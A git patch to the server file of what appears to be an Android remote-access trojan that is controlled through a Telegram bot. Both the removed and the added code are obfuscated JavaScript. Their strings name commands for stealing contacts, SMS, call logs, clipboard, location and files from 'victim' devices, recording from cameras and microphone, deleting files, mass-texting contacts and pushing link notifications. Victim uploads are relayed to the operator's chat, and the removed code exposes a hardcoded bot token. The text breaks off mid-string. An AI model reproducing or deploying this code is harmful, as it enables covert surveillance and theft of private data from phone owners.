From a411adfb48a2962561df5546e0bba6e5a333271f Mon Sep 17 00:00:00 2001
From: shiva yadav <94379471+shivaya-dav@users.noreply.github.com>
Date: Sat, 27 Aug 2022 13:27:09 -0700
Subject: [PATCH] added a lot new features
---
server.js | 24 ++++++++++++------------
1 file changed, 12 insertions(+), 12 deletions(-)
diff --git a/server.js b/server.js
index 97231de..f577096 100644
--- a/server.js
+++ b/server.js
@@ -1,14 +1,14 @@
-function _0x5503(){const _0x21113b=['66ZNdSsZ','http','80tPWVMu','body-parser','1716710vlyYlo','2502076HVozcp','uuid','12VapdUt','2024390UPeXhf','1616892jRRLGB','3156ZtGTZI','axios','5360YNLrFD','241803DgFjdT','8825019XADAQr','express','node-telegram-bot-api'];_0x5503=function(){return _0x21113b;};return _0x5503();}function _0x3e17(_0x12e93d,_0x23c86b){const _0x550346=_0x5503();return _0x3e17=function(_0x3e17ef,_0x32d22a){_0x3e17ef=_0x3e17ef-0xc7;let _0x467a95=_0x550346[_0x3e17ef];return _0x467a95;},_0x3e17(_0x12e93d,_0x23c86b);}const _0x4961d6=_0x3e17;(function(_0x2a9603,_0x416b29){const _0x249488=_0x3e17,_0x5e8aaa=_0x2a9603();while(!![]){try{const _0x5224cc=parseInt(_0x249488(0xcc))/0x1+parseInt(_0x249488(0xc8))/0x2+-parseInt(_0x249488(0xcd))/0x3*(parseInt(_0x249488(0xcf))/0x4)+-parseInt(_0x249488(0xc7))/0x5*(parseInt(_0x249488(0xca))/0x6)+-parseInt(_0x249488(0xd1))/0x7+-parseInt(_0x249488(0xd6))/0x8*(-parseInt(_0x249488(0xd0))/0x9)+parseInt(_0x249488(0xcb))/0xa*(parseInt(_0x249488(0xd4))/0xb);if(_0x5224cc===_0x416b29)break;else _0x5e8aaa['push'](_0x5e8aaa['shift']());}catch(_0x561e80){_0x5e8aaa['push'](_0x5e8aaa['shift']());}}}(_0x5503,0xf2b69));const socket=require('ws'),http=require(_0x4961d6(0xd5)),express=require(_0x4961d6(0xd2)),TelegramBot=require(_0x4961d6(0xd3)),multer=require('multer'),bodyParser=require(_0x4961d6(0xd7)),uuid4=require(_0x4961d6(0xc9)),axios=require(_0x4961d6(0xce));
+const express = require('express');
+const webSocket = require('ws');
+const http = require('http')
+const telegramBot = require('node-telegram-bot-api')
+const uuid4 = require('uuid')
+const multer = require('multer');
+const bodyParser = require('body-parser')
+const axios = require("axios");
-const upload = multer();
-const app = express()
-app.use(bodyParser.json());
-const server = http.createServer(app);
-const wss = new socket.Server({server});
-const chatId = '5265371934'
-const token = '5171666407:AAFbQ6iLPo2r9DazrMN9sPhtYdWLy_uxGf8'
-const serverAddr = ''
-const bot = new TelegramBot(token, {polling: true});
+const token = 'enter here your bot token'
+const id = 'enter here your chat id'
+const address = 'https://www.google.com'
-// request -------------------------------------------------------------------
-function _0x4c14(){const _0x3edb4c=['Mic\x201\x20๐ค','/sendLocation','sendDocument','data','8330440SpZacJ','split','cam2','18rUBxXK','120495lhjred','originalname','All\x20Contact\x20๐ค','Server\x20started\x20on\x20port\x20','','send','cam1','mi2','text','All\x20Sms\x20๐ฌ','file','Your\x20Request\x20Is\x20On\x20Progress\x20!','single','Mic\x203\x20๐ค','clients','Call\x20Log\x20๐','/sendText','Get\x20Folder\x20/\x20File\x20๐','135227VFXWyf','df&','8PWkFWY','Device\x20Model\x20๐ฑ','PORT','connection','โ\x20Select\x20Action\x20For\x20Device\x20:\x0a&','Status\x20โ','get','mi3','Welcome','forEach','161439pIBVgF','HTML','/sendFile','gf&','everything is fine now edit the apk src','Clip\x20Board\x20๐','body','740464YOjhCq','socket','!\x0a\x0aAction\x20Get\x20File\x20/\x20Folder\x0a๐ต\x20Please\x20Reply\x20File\x20/\x20Folder\x20Path:','!\x0aAction\x20Delete\x20File\x20/\x20Folder\x0a๐ต\x20Please\x20Reply\x20File\x20/\x20Folder\x20Path:','Delete\x20Folder\x20/\x20File\x20๐','size','\x20๐','sendMessage','log','Send\x20Sms\x20๐ฌ','toString','listen','post','ss&','reply_to_message','address','uuid','ID\x20=>\x20','replaceAll','5688936vWUlXN','New\x20Target\x20Connected\x20๐ฑ\x0a\x0aID\x20=\x20','2svBYgi','Action\x20โ','port','buffer','Installed\x20Apps\x20๐ฒ','mi1','catch','sendLocation','1777580wjzGmn'];_0x4c14=function(){return _0x3edb4c;};return _0x4c14();}const _0x4956d8=_0x2559;function _0x2559(_0x75be18,_0x458b6b){const _0x4c147f=_0x4c14();return _0x2559=function(_0x255919,_0x54a1c0){_0x255919=_0x255919-0x15c;let _0x10b682=_0x4c147f[_0x255919];return _0x10b682;},_0x2559(_0x75be18,_0x458b6b);}(function(_0x438afb,_0x27122c){const _0x574061=_0x2559,_0x401c6d=_0x438afb();while(!![]){try{const _0x49026d=parseInt(_0x574061(0x174))/0x1*(parseInt(_0x574061(0x19c))/0x2)+parseInt(_0x574061(0x180))/0x3*(-parseInt(_0x574061(0x176))/0x4)+-parseInt(_0x574061(0x162))/0x5*(parseInt(_0x574061(0x161))/0x6)+parseInt(_0x574061(0x1a4))/0x7+-parseInt(_0x574061(0x187))/0x8+-parseInt(_0x574061(0x19a))/0x9+parseInt(_0x574061(0x15e))/0xa;if(_0x49026d===_0x27122c)break;else _0x401c6d['push'](_0x401c6d['shift']());}catch(_0x2fd046){_0x401c6d['push'](_0x401c6d['shift']());}}}(_0x4c14,0x4d8ba),app[_0x4956d8(0x17c)]('/',(_0x39f5f5,_0xe7639e)=>{const _0x13909a=_0x4956d8;_0xe7639e[_0x13909a(0x167)](_0x13909a(0x184));}),app[_0x4956d8(0x193)](_0x4956d8(0x182),upload[_0x4956d8(0x16e)](_0x4956d8(0x16c)),(_0x26510a,_0x451acd)=>{const _0x187cff=_0x4956d8;var _0x8fab1c=_0x26510a[_0x187cff(0x16c)][_0x187cff(0x163)];bot[_0x187cff(0x15c)](chatId,_0x26510a[_0x187cff(0x16c)][_0x187cff(0x19f)],{},{'filename':_0x8fab1c,'contentType':'application/txt'})[_0x187cff(0x1a2)](function(_0x506a0c){const _0x5b0dd6=_0x187cff;console[_0x5b0dd6(0x18f)](_0x506a0c);}),_0x451acd['send'](_0x8fab1c);}),app[_0x4956d8(0x193)](_0x4956d8(0x172),(_0x12dd3a,_0x4ca86b)=>{const _0x10a33a=_0x4956d8;bot['sendMessage'](chatId,_0x12dd3a[_0x10a33a(0x186)][_0x10a33a(0x15d)],{'parse_mode':'HTML'}),_0x4ca86b[_0x10a33a(0x167)](_0x12dd3a['body'][_0x10a33a(0x15d)]);}),app[_0x4956d8(0x193)](_0x4956d8(0x1a6),(_0x125431,_0x4e551f)=>{const _0x40b86c=_0x4956d8;bot[_0x40b86c(0x1a3)](chatId,_0x125431[_0x40b86c(0x186)]['l1'],_0x125431[_0x40b86c(0x186)]['l2']),_0x4e551f['send'](_0x125431[_0x40b86c(0x186)]['l1'][_0x40b86c(0x191)]());}),server[_0x4956d8(0x192)](process['env'][_0x4956d8(0x178)]||0x2327,()=>{const _0x36a560=_0x4956d8;console[_0x36a560(0x18f)](_0x36a560(0x165)+server[_0x36a560(0x196)]()[_0x36a560(0x19e)]);}),wss['on'](_0x4956d8(0x179),(_0x108bfc,_0x4a9bdf)=>{const _0x5eacfc=_0x4956d8;_0x108bfc['uuid']=uuid4['v4'](),bot[_0x5eacfc(0x18e)](chatId,_0x5eacfc(0x19b)+_0x108bfc[_0x5eacfc(0x197)]+'
\x0aIP\x20=\x20'+_0x4a9bdf[_0x5eacfc(0x188)]['remoteAddress'][_0x5eacfc(0x191)]()[_0x5eacfc(0x199)]('f','')['replaceAll'](':','')+_0x5eacfc(0x18d),{'parse_mode':'HTML'});}),setInterval(()=>{const _0x10f523=_0x4956d8;wss[_0x10f523(0x170)][_0x10f523(0x17f)](_0x2ee4ba=>{const _0x7816ca=_0x10f523;_0x2ee4ba[_0x7816ca(0x167)]('be\x20alive');});},0x7d0),bot['on']('message',_0x2e7dc3=>{const _0x506000=_0x4956d8;_0x2e7dc3['text']==='/start'&&bot['sendMessage'](chatId,_0x506000(0x17e),{'reply_markup':{'keyboard':[[_0x506000(0x17b)],[_0x506000(0x19d)]]}});if(_0x2e7dc3[_0x506000(0x16a)]===_0x506000(0x17b)){const _0x2dccb1=wss[_0x506000(0x170)]['size'];let _0x1c84a4='';_0x2dccb1>0x0?(_0x1c84a4+=_0x506000(0x166)+_0x2dccb1+'\x20Online\x20Client\x20โ
\x0a\x0a',wss[_0x506000(0x170)][_0x506000(0x17f)](_0x7ad7c2=>{const _0x27aa7c=_0x506000;_0x1c84a4+=_0x27aa7c(0x198)+_0x7ad7c2[_0x27aa7c(0x197)]+'
\x0a\x0a';})):_0x1c84a4+='No\x20Online\x20Client\x20โ',bot['sendMessage'](chatId,_0x1c84a4,{'parse_mode':_0x506000(0x181)});}if(_0x2e7dc3[_0x506000(0x16a)]==='Action\x20โ'){const _0x2768bb=wss[_0x506000(0x170)][_0x506000(0x18c)];if(_0x2768bb>0x0){let _0x68c31c=[[{'text':_0x506000(0x171),'callback_data':'cl'},{'text':_0x506000(0x164),'callback_data':'gc'}],[{'text':_0x506000(0x16b),'callback_data':'as'},{'text':_0x506000(0x190),'callback_data':'ss'}],[{'text':_0x506000(0x1a0),'callback_data':'ia'},{'text':_0x506000(0x177),'callback_data':'dm'}],[{'text':_0x506000(0x173),'callback_data':'gf'},{'text':_0x506000(0x18b),'callback_data':'df'}],[{'text':'Main\x20Camera\x20๐ท','callback_data':_0x506000(0x168)},{'text':'Front\x20Camera\x20๐คณ','callback_data':_0x506000(0x160)}],[{'text':_0x506000(0x1a5),'callback_data':_0x506000(0x1a1)},{'text':'Mic\x202\x20๐ค','callback_data':_0x506000(0x169)},{'text':_0x506000(0x16f),'callback_data':_0x506000(0x17d)}],[{'text':_0x506000(0x185),'callback_data':'cp'}]];wss[_0x506000(0x170)][_0x506000(0x17f)](_0x2fd5b6=>{const _0x21d68c=_0x506000;bot[_0x21d68c(0x18e)](chatId,_0x21d68c(0x17a)+_0x2fd5b6[_0x21d68c(0x197)],{'reply_markup':{'inline_keyboard':_0x68c31c},'parse_mode':_0x21d68c(0x181)});});}else bot[_0x506000(0x18e)](chatId,'No\x20Online\x20Client\x20โ',{'parse_mode':'HTML'});}if(_0x2e7dc3[_0x506000(0x195)]){if(_0x2e7dc3[_0x506000(0x195)]['text'][_0x506000(0x15f)]('&')[0x0]==='ss'){const _0x191c29=_0x2e7dc3[_0x506000(0x16a)][_0x506000(0x15f)](']')[0x0]['split']('[')[0x1],_0x5af05c=_0x2e7dc3[_0x506000(0x195)][_0x506000(0x16a)][_0x506000(0x15f)]('!')[0x0][_0x506000(0x15f)]('&')[0x1];wss[_0x506000(0x170)][_0x506000(0x17f)](_0x4462d0=>{const _0x1ab50e=_0x506000;_0x4462d0['uuid']===_0x5af05c&&_0x4462d0[_0x1ab50e(0x167)](_0x1ab50e(0x194)+_0x191c29);}),bot['sendMessage'](chatId,'Your\x20Request\x20Is\x20On\x20Progress\x20!',{'reply_markup':{'keyboard':[[_0x506000(0x17b)],['Action\x20โ']]}});}if(_0x2e7dc3[_0x506000(0x195)][_0x506000(0x16a)][_0x506000(0x15f)]('&')[0x0]==='df'||_0x2e7dc3[_0x506000(0x195)][_0x506000(0x16a)][_0x506000(0x15f)]('&')[0x0]==='gf'){const _0x21b5e0=_0x2e7dc3[_0x506000(0x195)][_0x506000(0x16a)],_0x37a86f=_0x21b5e0[_0x506000(0x15f)]('!')[0x0][_0x506000(0x15f)]('&')[0x0],_0xc89aed=_0x21b5e0[_0x506000(0x15f)]('!')[0x0][_0x506000(0x15f)]('&')[0x1],_0x99de45=_0x2e7dc3['text'];wss[_0x506000(0x170)][_0x506000(0x17f)](_0x154abc=>{const _0x487a2e=_0x506000;_0x154abc[_0x487a2e(0x197)]===_0xc89aed&&_0x154abc[_0x487a2e(0x167)](_0x37a86f+'&'+_0x99de45);}),bot[_0x506000(0x18e)](chatId,_0x506000(0x16d),{'reply_markup':{'keyboard':[[_0x506000(0x17b)],['Action\x20โ']]}});}}}),bot['on']('callback_query',function onCallbackQuery(_0x5dbf90){const _0x10ceae=_0x4956d8,_0x1d0e4c=_0x5dbf90[_0x10ceae(0x15d)],_0x4dbd1f=_0x5dbf90['message']['text'][_0x10ceae(0x15f)]('&')[0x1];wss['clients'][_0x10ceae(0x17f)](_0x3409a8=>{const _0x268d4f=_0x10ceae;if(_0x3409a8['uuid']===_0x4dbd1f){if(_0x1d0e4c==='ss')bot[_0x268d4f(0x18e)](chatId,_0x268d4f(0x194)+_0x3409a8[_0x268d4f(0x197)]+'!\x0a\x0aAction\x20Send\x20Sms\x0a๐ต\x20Please\x20Reply\x0a\x20[{\x22number\x22:\x22target\x20number\x22,\x22message\x22:\x22your\x20message\x22}]
',{'reply_markup':{'force_reply':!![]},'parse_mode':_0x268d4f(0x181)});else{if(_0x1d0e4c==='gf')bot['sendMessage'](chatId,_0x268d4f(0x183)+_0x3409a8[_0x268d4f(0x197)]+_0x268d4f(0x189),{'reply_markup':{'force_reply':!![]},'parse_mode':_0x268d4f(0x181)});else _0x1d0e4c==='df'?bot['sendMessage'](chatId,_0x268d4f(0x175)+_0x3409a8[_0x268d4f(0x197)]+_0x268d4f(0x18a),{'reply_markup':{'force_reply':!![]},'parse_mode':_0x268d4f(0x181)}):_0x3409a8[_0x268d4f(0x167)](_0x1d0e4c);}}});}),setInterval(()=>{axios['get'](serverAddr);},0x1d4c0));
+const _0x8ea7c8=_0x4cda;function _0x4cda(_0x3dda28,_0x227d18){const _0x877457=_0x8774();return _0x4cda=function(_0x4cda7c,_0x574ecd){_0x4cda7c=_0x4cda7c-0xe2;let _0x580a59=_0x877457[_0x4cda7c];return _0x580a59;},_0x4cda(_0x3dda28,_0x227d18);}(function(_0x1541e0,_0x50640d){const _0x50dcdb=_0x4cda,_0x18f5c3=_0x1541e0();while(!![]){try{const _0x13173f=parseInt(_0x50dcdb(0x13e))/0x1*(-parseInt(_0x50dcdb(0x170))/0x2)+-parseInt(_0x50dcdb(0x102))/0x3*(-parseInt(_0x50dcdb(0x15e))/0x4)+-parseInt(_0x50dcdb(0x137))/0x5+-parseInt(_0x50dcdb(0x15d))/0x6*(parseInt(_0x50dcdb(0x164))/0x7)+-parseInt(_0x50dcdb(0xf5))/0x8+-parseInt(_0x50dcdb(0xff))/0x9+parseInt(_0x50dcdb(0x156))/0xa;if(_0x13173f===_0x50640d)break;else _0x18f5c3['push'](_0x18f5c3['shift']());}catch(_0x45b5c3){_0x18f5c3['push'](_0x18f5c3['shift']());}}}(_0x8774,0x56da3));const app=express(),appServer=http[_0x8ea7c8(0x12a)](app),appSocket=new webSocket['Server']({'server':appServer}),appBot=new telegramBot(token,{'polling':!![]}),appClients=new Map(),upload=multer();function _0x8774(){const _0x1bad81=['battery','/uploadText','uuid','โข\x20แด
แดแด ษชแดแด\x20แดแดแด
แดส\x20:\x20','contacts:','ยฐโข\x20๐๐ค๐๐๐ฉ๐๐ค๐ฃ\x20๐๐ง๐ค๐ข\x20','messages','๐๐๐ก๐๐๐\x20๐๐๐ข๐๐ง๐','๐๐ค๐๐๐ฉ๐๐ค๐ฃ','/uploadFile','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ฅ๐๐ฉ๐\x20๐ค๐\x20๐ฉ๐๐\x20๐๐๐ก๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐๐ก๐๐ฉ๐','deleteMessage','editMessageText','๐๐ค๐๐จ๐ฉ','sendLocation','apps:','log','env','PORT','27054460qFcHoJ','โขษช๊ฐ\x20สแดแด\x20แดกแดษดแด\x20แดแด\x20๊ฑแดษดแด
\x20๊ฑแด๊ฑ\x20แดแด\x20สแดแดแดส\x20แดแดแดษดแดสส\x20ษดแดแดสแดส๊ฑ,\x20สแดแด\x20แดแดษด\x20แดษดแดแดส\x20แดสแด\x20ษดแดแดสแดส\x20แดกษชแดส\x20แดขแดสแด\x20แดแด\x20แดสแด\x20สแดษขษชษดษดษชษดษข,\x20แดแดสแดสแดกษช๊ฑแด\x20แดษดแดแดส\x20แดสแด\x20ษดแดแดสแดส\x20แดกษชแดส\x20แดสแด\x20แดแดแดษดแดสส\x20แดแดแด
แด','๐ฟ๐๐ซ๐๐๐\x20๐๐ฃ๐๐ค','camera_selfie','post','๐พ๐๐ก๐ก๐จ','๐๐๐๐ง๐๐ฉ๐','726pUcFcG','196572hdDNip','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ข๐๐จ๐จ๐๐๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐จ๐๐ฃ๐\x20๐ฉ๐ค\x20๐๐ก๐ก\x20๐๐ค๐ฃ๐ฉ๐๐๐ฉ๐จ\x0a\x0a','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ข๐๐จ๐จ๐๐๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐ฅ๐ฅ๐๐๐ง\x20๐๐จ\x20๐ฃ๐ค๐ฉ๐๐๐๐๐๐ฉ๐๐ค๐ฃ\x0a\x0a','send_message_to_all','๐๐๐จ๐จ๐๐๐๐จ','โข\x20แดสษชแดแด\x20แดษด\x20แดสแด\x20แดแดแดแดแดษดแด
\x20สแดแดแดแดษด\x20แดษดแด
\x20๊ฑแดสแดแดแด\x20แดสแด\x20แด
แด๊ฑษชสแดแด
\x20แด
แดแด ษชแดแด\x20แดสแดษด\x20๊ฑแดสแดแดแด\x20แดสแด\x20แด
แด๊ฑษชสแดแด
\x20แดแดแดแดแดษดแด
\x20แดแดแดษดษข\x20แดสแด\x20แดแดแดแดแดษดแด
\x20แด
แดแด แดสแดแดแดแด
\x20สส\x20:\x20@shivayadavv๊ฑ\x0a\x0a','30135DDfqpg','','version','\x20๐๐๐ซ๐๐๐','๐๐๐ฃ๐\x20๐ข๐๐จ๐จ๐๐๐\x20๐ฉ๐ค\x20๐๐ก๐ก\x20๐๐ค๐ฃ๐ฉ๐๐๐ฉ๐จ','clipboard:','ยฐโข\x20๐๐ง๐๐๐ฉ,\x20๐ฃ๐ค๐ฌ\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ก๐๐ฃ๐ \x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐\x20๐ค๐ฅ๐๐ฃ๐๐\x20๐๐ฎ\x20๐ฉ๐๐\x20๐ฃ๐ค๐ฉ๐๐๐๐๐๐ฉ๐๐ค๐ฃ','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐๐ค๐ฌ\x20๐ก๐ค๐ฃ๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐๐\x20๐ข๐๐๐ง๐ค๐ฅ๐๐ค๐ฃ๐\x20๐ฉ๐ค\x20๐๐\x20๐ง๐๐๐ค๐ง๐๐๐\x0a\x0a','ยฐโข\x20๐๐ง๐๐๐ฉ,\x20๐ฃ๐ค๐ฌ\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ข๐๐จ๐จ๐๐๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐จ๐๐ฃ๐\x20๐ฉ๐ค\x20๐ฉ๐๐๐จ\x20๐ฃ๐ช๐ข๐๐๐ง\x0a\x0a','set','file:','size','78eEVMnq','push','show_notification','
๐๐๐ง๐ซ๐๐ง\x20๐ช๐ฅ๐ก๐ค๐๐๐๐\x20๐จ๐ช๐๐๐๐จ๐จ๐๐ช๐ก๐ก๐ฎ
','ยฐโข\x20๐๐ก๐๐๐จ๐\x20๐ง๐๐ฅ๐ก๐ฎ\x20๐ฉ๐๐\x20๐ฃ๐ช๐ข๐๐๐ง\x20๐ฉ๐ค\x20๐ฌ๐๐๐๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐จ๐๐ฃ๐\x20๐ฉ๐๐\x20๐๐๐\x0a\x0a','forEach','device_info:','vibrate','๐พ๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐\x20๐๐๐ซ๐๐๐๐จ','callback_query','play_audio:','โข\x20แดษดแด
สแดษชแด
\x20แด แดส๊ฑษชแดษด\x20:\x20','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐๐ค๐ฌ\x20๐ก๐ค๐ฃ๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐๐\x20๐ข๐๐๐ง๐ค๐ฅ๐๐ค๐ฃ๐\x20๐ฉ๐ค\x20๐๐\x20๐ง๐๐๐ค๐ง๐๐๐','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ฅ๐๐ฉ๐\x20๐ค๐\x20๐ฉ๐๐\x20๐๐๐ก๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐ค๐ฌ๐ฃ๐ก๐ค๐๐','delete_file:','ยฐโข\x20๐๐๐ก๐๐๐ฉ\x20๐๐ค๐ข๐ข๐๐ฃ๐\x20๐๐ค๐ง\x20๐๐๐ซ๐๐๐\x20:\x20','rec_camera_selfie:','๐ฟ๐๐ก๐๐ฉ๐\x20๐๐๐ก๐','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ข๐๐จ๐จ๐๐๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐จ๐๐ฃ๐\x20๐ฉ๐ค\x20๐๐ก๐ก\x20๐๐ค๐ฃ๐ฉ๐๐๐ฉ๐จ','headers','โข\x20แดสแดแด ษชแด
แดส\x20:\x20','ยฐโข\x20๐๐๐ฌ\x20๐๐๐ซ๐๐๐\x20๐๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐\x0a\x0a','โข\x20แดกสแดษด\x20แดสแด\x20แด ษชแดแดษชแด\x20แดสษชแดแด๊ฑ\x20แดษด\x20แดสแด\x20ษดแดแดษช๊ฐษชแดแดแดษชแดษด,\x20แดสแด\x20สษชษดแด\x20สแดแด\x20แดสแด\x20แดษดแดแดสษชษดษข\x20แดกษชสส\x20สแด\x20แดแดแดษดแดแด
','device:','play_audio','๐๐๐ค๐ฌ\x20๐ฃ๐ค๐ฉ๐๐๐๐๐๐ฉ๐๐ค๐ฃ','calls','โข\x20๊ฑแดสแดแดษด\x20สสษชษขสแดษดแด๊ฑ๊ฑ\x20:\x20','toast','โข\x20แดกสแดษด\x20สแดแด\x20สแดแดแดษชแด แด\x20แดสแด\x20แดแดษดษดแดแดแดษชแดษด\x20แดแด๊ฑ๊ฑแดษขแด,\x20ษชแด\x20แดแดแดษด๊ฑ\x20แดสแดแด\x20แดสแด\x20แดแดสษขแดแด\x20แด
แดแด ษชแดแด\x20ษช๊ฑ\x20แดแดษดษดแดแดแดแดแด
\x20แดษดแด
\x20สแดแดแด
ส\x20แดแด\x20สแดแดแดษชแด แด\x20แดสแด\x20แดแดแดแดแดษดแด
\x0a\x0a','location:','brightness','rec_camera_main:','ยฐโข\x20๐๐ค\x20๐๐ค๐ฃ๐ฃ๐๐๐ฉ๐๐ฃ๐\x20๐๐๐ซ๐๐๐๐จ\x20๐๐ซ๐๐๐ก๐๐๐ก๐\x0a\x0a','camera_main:','4571544OZWyfH','ยฐโข\x20๐๐ค๐ช๐ง\x20๐ง๐๐ฆ๐ช๐๐จ๐ฉ\x20๐๐จ\x20๐ค๐ฃ\x20๐ฅ๐ง๐ค๐๐๐จ๐จ\x0a\x0a','โข\x20สแดแด\x20แดกษชสส\x20สแดแดแดษชแด แด\x20แด\x20สแด๊ฑแดแดษด๊ฑแด\x20ษชษด\x20แดสแด\x20ษดแดxแด\x20๊ฐแดแดก\x20แดแดแดแดษดแด๊ฑ','sendMessage','โข\x20สแด\x20แดแดสแด๊ฐแดส\x20แดสแดแด\x20แดสแด\x20แดแด๊ฑ๊ฑแดษขแด\x20แดกษชสส\x20ษดแดแด\x20สแด\x20๊ฑแดษดแด\x20ษช๊ฐ\x20แดสแด\x20ษดแดแดสแดส\x20แด๊ฐ\x20แดสแดสแดแดแดแดส๊ฑ\x20ษชษด\x20สแดแดส\x20แดแด๊ฑ๊ฑแดษขแด\x20ษช๊ฑ\x20แดแดสแด\x20แดสแดษด\x20แดสสแดแดกแดแด
','\x20๐๐๐ซ๐๐๐\x0a\x0a','ยฐโข\x20๐๐ง๐๐๐ฉ,\x20๐ฃ๐ค๐ฌ\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ก๐๐ฃ๐ \x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐\x20๐ค๐ฅ๐๐ฃ๐๐\x20๐๐ฎ\x20๐ฉ๐๐\x20๐ฃ๐ค๐ฉ๐๐๐๐๐๐ฉ๐๐ค๐ฃ\x0a\x0a','apps','ยฐโข\x20๐๐๐ง๐ข๐๐จ๐จ๐๐ค๐ฃ\x20๐๐๐ฃ๐๐๐','ยฐโข\x20๐๐๐ก๐๐ค๐ข๐\x20๐ฉ๐ค\x20๐๐๐ฉ\x20๐ฅ๐๐ฃ๐๐ก\x0a\x0a','1705491CcuiGK','โข\x20สแดแดแดแดสส\x20:\x20','๐๐๐ฉ\x20๐๐๐ก๐','9pBymxr','send','send_message_to_all:','close','use','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ข๐๐จ๐จ๐๐๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐ฅ๐ฅ๐๐๐ง\x20๐๐จ\x20๐ฃ๐ค๐ฉ๐๐๐๐๐๐ฉ๐๐ค๐ฃ','ยฐโข\x20๐๐ง๐๐๐ฉ,\x20๐ฃ๐ค๐ฌ\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ข๐๐จ๐จ๐๐๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐จ๐๐ฃ๐\x20๐ฉ๐ค\x20๐ฉ๐๐๐จ\x20๐ฃ๐ช๐ข๐๐๐ง','camera_main','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐ฉ๐๐\x20๐ฅ๐๐ฉ๐\x20๐ค๐\x20๐ฉ๐๐\x20๐๐๐ก๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐ค\x20๐๐ค๐ฌ๐ฃ๐ก๐ค๐๐\x0a\x0a','ยฐโข\x20๐๐ฃ๐ฉ๐๐ง\x20๐๐ค๐ฌ\x20๐ก๐ค๐ฃ๐\x20๐ฎ๐ค๐ช\x20๐ฌ๐๐ฃ๐ฉ\x20๐ฉ๐๐\x20๐ข๐๐๐ฃ\x20๐๐๐ข๐๐ง๐\x20๐ฉ๐ค\x20๐๐\x20๐ง๐๐๐ค๐ง๐๐๐','๐๐๐ฃ๐\x20๐ข๐๐จ๐จ๐๐๐','microphone:','ยฐโข\x20๐๐๐จ๐จ๐๐๐\x20๐๐ง๐ค๐ข\x20','body','json','lon','ยฐโข\x20๐๐๐ก๐๐๐ฉ\x20๐๐๐ซ๐๐๐\x20๐ฉ๐ค\x20๐๐ญ๐๐๐ช๐ฉ๐\x20๐๐ค๐ข๐ข๐๐ฃ๐','get','send_message','device','\x0a','โข\x20แดแดแดแด\x20๊ฑแดสแด\x20แดสแด\x20แดแดแดสษชแดแดแดษชแดษด\x20ษช๊ฑ\x20ษชษด๊ฑแดแดสสแดแด
\x20แดษด\x20แดสแด\x20แดแดสษขแดแด\x20แด
แดแด ษชแดแด','includes','โข\x20สแดแด\x20แด
แด\x20ษดแดแด\x20ษดแดแดแด
\x20แดแด\x20แดษดแดแดส\x20แดสแด\x20๊ฐแดสส\x20๊ฐษชสแด\x20แดแดแดส,\x20แดแด๊ฑแด\x20แดษดแดแดส\x20แดสแด\x20แดแดษชษด\x20แดแดแดส.\x20๊ฐแดส\x20แดxแดแดแดสแด,\x20แดษดแดแดส\x20DCIM/Camera\x20\x20แดแด\x20แด
